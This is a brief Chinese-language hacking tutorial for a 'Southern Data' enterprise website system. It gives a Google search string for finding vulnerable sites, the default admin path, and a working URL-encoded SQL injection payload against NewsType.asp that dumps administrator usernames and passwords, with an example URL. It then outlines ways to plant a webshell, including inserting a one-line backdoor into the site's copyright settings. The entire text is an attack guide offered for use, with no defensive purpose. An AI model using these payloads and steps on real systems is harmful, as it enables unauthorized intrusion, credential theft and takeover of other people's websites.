南方数据企业0day漏洞爆后台密码
谷歌搜索:inurl:”HomeMarket.asp”
默认后台地址:/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码:
NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20
union%20select%20*%20from%20news%20where%201=2%20and%20''='
例子:www.xxxx.com/
NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20
union%20select%20*%20from%20news%20where%201=2%20and%20''='
爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话